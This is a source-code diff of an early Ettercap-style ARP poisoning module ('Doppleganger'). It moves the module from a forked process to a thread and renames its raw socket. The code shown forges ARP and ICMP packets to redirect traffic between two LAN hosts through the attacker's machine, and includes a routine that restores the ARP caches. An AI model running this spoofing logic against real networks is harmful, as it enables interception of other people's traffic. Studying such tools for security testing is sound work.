@@ -17,27 +17,29 @@
     along with this program; if not, write to the Free Software
     Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 
-    $Id: ec_doppleganger.c,v 1.1.1.1 2001/08/27 19:24:58 alor Exp $
+    $Id: ec_doppleganger.c,v 1.6 2001/12/13 17:05:20 alor Exp $
 */
 
-#include <stdio.h>
+#include "include/ec_main.h"
+
 #include <sys/time.h>
 #include <signal.h>
 #include <sys/ioctl.h>
-#include <string.h>
-#include <unistd.h>
-#include <stdlib.h>
 
-#include "include/ec_main.h"
 #include "include/ec_inet.h"
 #include "include/ec_inet_forge.h"
 #include "include/ec_inet_structures.h"
 #include "include/ec_error.h"
+#include "include/ec_thread.h"
 
-#ifdef DEBUG
-   #include "include/ec_debug.h"
-#endif
 
+typedef struct {
+    char iface[10];
+    char IP1[16];
+    char IP2[16];
+    char MAC1[20];
+    char MAC2[20];
+} dopple_param;
 
 // global data
 u_char *buf1=NULL, *buf2=NULL;
@@ -47,19 +49,19 @@ char PoorMAC2[6];
 char PoorIP1[17];
 char PoorIP2[17];
 u_long BroadIP, MyIP, NetMask;
-int sock;
+int dopple_sock;
 
 char MyMAC[6];       // my MAC address
 
 // protos...
 
-void Doppleganger_reARP(int dummy);
-int Doppleganger_Run(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2);
-int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2);
+void Doppleganger_reARP(void *dummy);
+pthread_t Doppleganger_Run(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2);
+void * Doppleganger_Main(void *);
 
 // ----------------------------
 
-void Doppleganger_reARP(int dummy)        // turns back the ARP cache...
+void Doppleganger_reARP(void *dummy)        // turns back the ARP cache...
 {
    int i, j;
 
@@ -68,7 +70,7 @@ void Doppleganger_reARP(int dummy)        // turns back the ARP cache...
 #endif
 
    // legal ARP reply :)
-   for(j=0; j<5; j++)
+   for(j=0; j<3; j++)
    {
        if ( ((buf1 && !buf2) || (!buf1 && buf2)) && number_of_hosts_in_lan > 1 )
        {
@@ -86,7 +88,7 @@ void Doppleganger_reARP(int dummy)        // turns back the ARP cache...
                   Inet_Forge_arp( buf1+ETH_HEADER, (j%2) ? ARPOP_REQUEST : ARPOP_REPLY,
                                   SmartMAC1, inet_addr(Host_In_LAN[i].ip),
                                   PoorMAC1, inet_addr(PoorIP1) );
-                  Inet_SendRawPacket(sock, buf1, ETH_HEADER + ARP_HEADER);
+                  Inet_SendRawPacket(dopple_sock, buf1, ETH_HEADER + ARP_HEADER);
                }
                if (buf2)
                {
@@ -95,7 +97,7 @@ void Doppleganger_reARP(int dummy)        // turns back the ARP cache...
                   Inet_Forge_arp( buf2+ETH_HEADER, (j%2) ? ARPOP_REQUEST : ARPOP_REPLY,
                                   SmartMAC2, inet_addr(Host_In_LAN[i].ip),
                                   PoorMAC2, inet_addr(PoorIP2) );
-                  Inet_SendRawPacket(sock, buf2, ETH_HEADER + ARP_HEADER);
+                  Inet_SendRawPacket(dopple_sock, buf2, ETH_HEADER + ARP_HEADER);
                }
             }
             usleep(Options.storm_delay);
@@ -117,9 +119,9 @@ void Doppleganger_reARP(int dummy)        // turns back the ARP cache...
                            PoorMAC2, inet_addr(PoorIP2),
                            PoorMAC1, inet_addr(PoorIP1) );
 
-       if (buf1) Inet_SendRawPacket(sock, buf1, ETH_HEADER + ARP_HEADER);
+       if (buf1) Inet_SendRawPacket(dopple_sock, buf1, ETH_HEADER + ARP_HEADER);
        usleep(Options.storm_delay);
-       if (buf2) Inet_SendRawPacket(sock, buf2, ETH_HEADER + ARP_HEADER);
+       if (buf2) Inet_SendRawPacket(dopple_sock, buf2, ETH_HEADER + ARP_HEADER);
 
        sleep(1);
    }
@@ -128,36 +130,34 @@ void Doppleganger_reARP(int dummy)        // turns back the ARP cache...
    Debug_msg("Doppleganger_reARP -- END");
 #endif
 
-   exit(0);
 }
 
 
 
-int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
+void * Doppleganger_Main(void *param)
 {
    int MTU, replies=0;
    u_char BroadMAC[6]={0xff,0xff,0xff,0xff,0xff,0xff};
 
-   strcpy(program_argv0, "dopplega");
 
-   if (strcmp(MAC1,"")) buf1 = Inet_Forge_packet( ETH_HEADER + IP_HEADER + ICMP_HEADER );
-   if (strcmp(MAC2,"")) buf2 = Inet_Forge_packet( ETH_HEADER + IP_HEADER + ICMP_HEADER );
+   if (strcmp(((dopple_param *)param)->MAC1,"")) buf1 = Inet_Forge_packet( ETH_HEADER + IP_HEADER + ICMP_HEADER );
+   if (strcmp(((dopple_param *)param)->MAC2,"")) buf2 = Inet_Forge_packet( ETH_HEADER + IP_HEADER + ICMP_HEADER );
 
-   if (buf1) Inet_GetMACfromString(MAC1, PoorMAC1);
+   if (buf1) Inet_GetMACfromString(((dopple_param *)param)->MAC1, PoorMAC1);
    else memcpy(PoorMAC1, BroadMAC, 6);
 
-   if (buf2) Inet_GetMACfromString(MAC2, PoorMAC2);
+   if (buf2) Inet_GetMACfromString(((dopple_param *)param)->MAC2, PoorMAC2);
    else memcpy(PoorMAC2, BroadMAC, 6);
 
-   if (buf1) strncpy(PoorIP1,IP1, 17);
-   else strncpy(PoorIP1,"69.69.69.69", 11);
+   if (buf1) strlcpy(PoorIP1,((dopple_param *)param)->IP1, 17);
+   else strcpy(PoorIP1,"69.69.69.69");
 
-   if (buf2) strncpy(PoorIP2,IP2, 17);
-   else strncpy(PoorIP2,"69.69.69.69", 11);
+   if (buf2) strlcpy(PoorIP2,((dopple_param *)param)->IP2, 17);
+   else strcpy(PoorIP2,"69.69.69.69");
 
-   sock = Inet_OpenRawSock(iface);
+   dopple_sock = Inet_OpenRawSock(((dopple_param *)param)->iface);
 
-   Inet_GetIfaceInfo(iface, &MTU, MyMAC, &MyIP, &NetMask);
+   Inet_GetIfaceInfo(((dopple_param *)param)->iface, &MTU, MyMAC, &MyIP, &NetMask);
 
    BroadIP=(MyIP&NetMask)|(~NetMask);
 
@@ -175,8 +175,8 @@ int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
        Inet_Forge_icmp( buf1 + ETH_HEADER + IP_HEADER, ICMP_ECHO, 0, NULL, 0 );
        Inet_Forge_icmp( buf2 + ETH_HEADER + IP_HEADER, ICMP_ECHO, 0, NULL, 0 );
 
-       Inet_SendRawPacket(sock, buf1, ETH_HEADER + IP_HEADER + ICMP_HEADER);
-       Inet_SendRawPacket(sock, buf2, ETH_HEADER + IP_HEADER + ICMP_HEADER);
+       Inet_SendRawPacket(dopple_sock, buf1, ETH_HEADER + IP_HEADER + ICMP_HEADER);
+       Inet_SendRawPacket(dopple_sock, buf2, ETH_HEADER + IP_HEADER + ICMP_HEADER);
    }
    else // We don't need other conditions
    {
@@ -189,7 +189,7 @@ int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
                   Inet_Forge_ip( buf1 + ETH_HEADER, inet_addr(PoorIP1), BroadIP,
                                  ICMP_HEADER, 0xe77e, 0, IPPROTO_ICMP );
                   Inet_Forge_icmp( buf1 + ETH_HEADER + IP_HEADER, ICMP_ECHO, 0, NULL, 0 );
-                  Inet_SendRawPacket(sock, buf1, ETH_HEADER + IP_HEADER + ICMP_HEADER);
+                  Inet_SendRawPacket(dopple_sock, buf1, ETH_HEADER + IP_HEADER + ICMP_HEADER);
          }
          else
          {
@@ -197,7 +197,7 @@ int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
                   Inet_Forge_ip( buf2 + ETH_HEADER, inet_addr(PoorIP2), BroadIP,
                                  ICMP_HEADER, 0xe77e, 0, IPPROTO_ICMP );
                   Inet_Forge_icmp( buf2 + ETH_HEADER + IP_HEADER, ICMP_ECHO, 0, NULL, 0 );
-                  Inet_SendRawPacket(sock, buf2, ETH_HEADER + IP_HEADER + ICMP_HEADER);
+                  Inet_SendRawPacket(dopple_sock, buf2, ETH_HEADER + IP_HEADER + ICMP_HEADER);
          }
       }
 
@@ -205,7 +205,7 @@ int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
       {
          usleep(Options.storm_delay);
 
-         if (strcmp(Host_In_LAN[i].ip, IP1) && strcmp(Host_In_LAN[i].ip, IP2))   // don't send to the target
+         if (strcmp(Host_In_LAN[i].ip, ((dopple_param *)param)->IP1) && strcmp(Host_In_LAN[i].ip, ((dopple_param *)param)->IP2))   // don't send to the target
          {
             char SmartMAC1[6];
             char SmartMAC2[6];
@@ -217,13 +217,13 @@ int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
                Inet_Forge_ip( buf1 + ETH_HEADER, inet_addr(PoorIP1), inet_addr(Host_In_LAN[i].ip),
                    ICMP_HEADER, 0xe77e, 0, IPPROTO_ICMP );
                Inet_Forge_icmp( buf1 + ETH_HEADER + IP_HEADER, ICMP_ECHO, 0, NULL, 0 );
-               Inet_SendRawPacket(sock, buf1, ETH_HEADER + IP_HEADER + ICMP_HEADER);
+               Inet_SendRawPacket(dopple_sock, buf1, ETH_HEADER + IP_HEADER + ICMP_HEADER);
                usleep(Options.storm_delay);
                Inet_Forge_ethernet( buf1, MyMAC, PoorMAC1, ETH_P_IP );
                Inet_Forge_ip( buf1 + ETH_HEADER, inet_addr(Host_In_LAN[i].ip), inet_addr(PoorIP1),
                    ICMP_HEADER, 0xe77e, 0, IPPROTO_ICMP );
                Inet_Forge_icmp( buf1 + ETH_HEADER + IP_HEADER, ICMP_ECHO, 0, NULL, 0 );
-               Inet_SendRawPacket(sock, buf1, ETH_HEADER + IP_HEADER + ICMP_HEADER);
+               Inet_SendRawPacket(dopple_sock, buf1, ETH_HEADER + IP_HEADER + ICMP_HEADER);
             }
             if (buf2)
             {
@@ -232,36 +232,37 @@ int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
                Inet_Forge_ip( buf2 + ETH_HEADER, inet_addr(PoorIP2), inet_addr(Host_In_LAN[i].ip),
                    ICMP_HEADER, 0xe77e, 0, IPPROTO_ICMP );
                Inet_Forge_icmp( buf2 + ETH_HEADER + IP_HEADER, ICMP_ECHO, 0, NULL, 0 );
-               Inet_SendRawPacket(sock, buf2, ETH_HEADER + IP_HEADER + ICMP_HEADER);
+               Inet_SendRawPacket(dopple_sock, buf2, ETH_HEADER + IP_HEADER + ICMP_HEADER);
                usleep(Options.storm_delay);
                Inet_Forge_ethernet( buf2, MyMAC, PoorMAC2, ETH_P_IP );
                Inet_Forge_ip( buf2 + ETH_HEADER, inet_addr(Host_In_LAN[i].ip), inet_addr(PoorIP2),
                    ICMP_HEADER, 0xe77e, 0, IPPROTO_ICMP );
                Inet_Forge_icmp( buf2 + ETH_HEADER + IP_HEADER, ICMP_ECHO, 0, NULL, 0 );
-               Inet_SendRawPacket(sock, buf2, ETH_HEADER + IP_HEADER + ICMP_HEADER);
+               Inet_SendRawPacket(dopple_sock, buf2, ETH_HEADER + IP_HEADER + ICMP_HEADER);
             }
          }
       }
    }
 
-   signal(SIGINT, Doppleganger_reARP);
-   signal(SIGTERM, Doppleganger_reARP);
 
    if ( ((buf1 && !buf2) || (!buf1 && buf2)) && number_of_hosts_in_lan > 1 )  // smart ARP
    {
       #ifdef DEBUG
          Debug_msg("Doppleganger_Run -- SMART ARPing... [delay = %d]", Options.delay);
       #endif
+
+      exit_func(Doppleganger_reARP);
+
       loop
       {
          int i;
 
-         if (getppid() == 1) Doppleganger_reARP(SIGTERM);
+         pthread_testcancel();
 
          for(i = 1; i<number_of_hosts_in_lan; i++)
          {
             usleep(Options.storm_delay);
-            if (strcmp(Host_In_LAN[i].ip, IP1) && strcmp(Host_In_LAN[i].ip, IP2))   // don't send to the target
+            if (strcmp(Host_In_LAN[i].ip, ((dopple_param *)param)->IP1) && strcmp(Host_In_LAN[i].ip, ((dopple_param *)param)->IP2))   // don't send to the target
             {
                char SmartMAC1[6];
                char SmartMAC2[6];
@@ -273,13 +274,13 @@ int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
                   Inet_Forge_arp( buf1+ETH_HEADER, (replies%2) ? ARPOP_REQUEST : ARPOP_REPLY,
                                   MyMAC, inet_addr(PoorIP1),
                                   SmartMAC2, inet_addr(Host_In_LAN[i].ip) );
-                  Inet_SendRawPacket(sock, buf1, ETH_HEADER + ARP_HEADER);
+                  Inet_SendRawPacket(dopple_sock, buf1, ETH_HEADER + ARP_HEADER);
                   usleep(Options.storm_delay);
                   Inet_Forge_ethernet( buf1, MyMAC, PoorMAC1, ETH_P_ARP );
                   Inet_Forge_arp( buf1+ETH_HEADER, (replies%2) ? ARPOP_REQUEST : ARPOP_REPLY,
                                   MyMAC, inet_addr(Host_In_LAN[i].ip),
                                   PoorMAC1, inet_addr(PoorIP1) );
-                  Inet_SendRawPacket(sock, buf1, ETH_HEADER + ARP_HEADER);
+                  Inet_SendRawPacket(dopple_sock, buf1, ETH_HEADER + ARP_HEADER);
                }
                if (buf2)
                {
@@ -288,13 +289,13 @@ int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
                   Inet_Forge_arp( buf2+ETH_HEADER, (replies%2) ? ARPOP_REQUEST : ARPOP_REPLY,
                                   MyMAC, inet_addr(PoorIP2),
                                   SmartMAC1, inet_addr(Host_In_LAN[i].ip) );
-                  Inet_SendRawPacket(sock, buf2, ETH_HEADER + ARP_HEADER);
+                  Inet_SendRawPacket(dopple_sock, buf2, ETH_HEADER + ARP_HEADER);
                   usleep(Options.storm_delay);
                   Inet_Forge_ethernet( buf2, MyMAC, PoorMAC2, ETH_P_ARP );
                   Inet_Forge_arp( buf2+ETH_HEADER, (replies%2) ? ARPOP_REQUEST : ARPOP_REPLY,
                                   MyMAC, inet_addr(Host_In_LAN[i].ip),
                                   PoorMAC2, inet_addr(PoorIP2) );
-                  Inet_SendRawPacket(sock, buf2, ETH_HEADER + ARP_HEADER);
+                  Inet_SendRawPacket(dopple_sock, buf2, ETH_HEADER + ARP_HEADER);
                }
             }
          }
@@ -306,6 +307,8 @@ int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
 
          replies++;
       }
+
+      exit_func_end();
    }
    else
    {
@@ -332,13 +335,15 @@ int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
                           PoorMAC1, inet_addr(PoorIP1) );
       }
 
+      exit_func(Doppleganger_reARP);
+
       loop
       {
-         if (getppid() == 1) Doppleganger_reARP(SIGTERM);
+         pthread_testcancel();
 
-         if (buf1) Inet_SendRawPacket(sock, buf1, ETH_HEADER + ARP_HEADER);
+         if (buf1) Inet_SendRawPacket(dopple_sock, buf1, ETH_HEADER + ARP_HEADER);
          usleep(Options.storm_delay);
-         if (buf2) Inet_SendRawPacket(sock, buf2, ETH_HEADER + ARP_HEADER);
+         if (buf2) Inet_SendRawPacket(dopple_sock, buf2, ETH_HEADER + ARP_HEADER);
 
          if (replies<4)
              sleep(2);
@@ -346,26 +351,29 @@ int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
              sleep(Options.delay);
          replies++;
       }
+
+      exit_func_end();
    }
    return(0);
 }
 
 
 
-int Doppleganger_Run(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
+pthread_t Doppleganger_Run(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
 {
-   int Dopple_pid;
+   static dopple_param param;
 
 #ifdef DEBUG
        Debug_msg("Doppleganger_Run -- [%s] [%s] [%s] [%s]", IP1, IP2, MAC1, MAC2);
 #endif
 
-   if (!(Dopple_pid = fork()))
-      Doppleganger_Main(iface, IP1, IP2, MAC1, MAC2);
-   else
-      return Dopple_pid;
+   strlcpy(param.iface, iface, sizeof(param.iface));
+   strlcpy(param.IP1, IP1, sizeof(param.IP1));
+   strlcpy(param.IP2, IP2, sizeof(param.IP2));
+   strlcpy(param.MAC1, MAC1, sizeof(param.MAC1));
+   strlcpy(param.MAC2, MAC2, sizeof(param.MAC2));
 
-   return 0;
+   return ECThread_create("dopplega", &Doppleganger_Main, &param);
 }
 
 /* EOF */
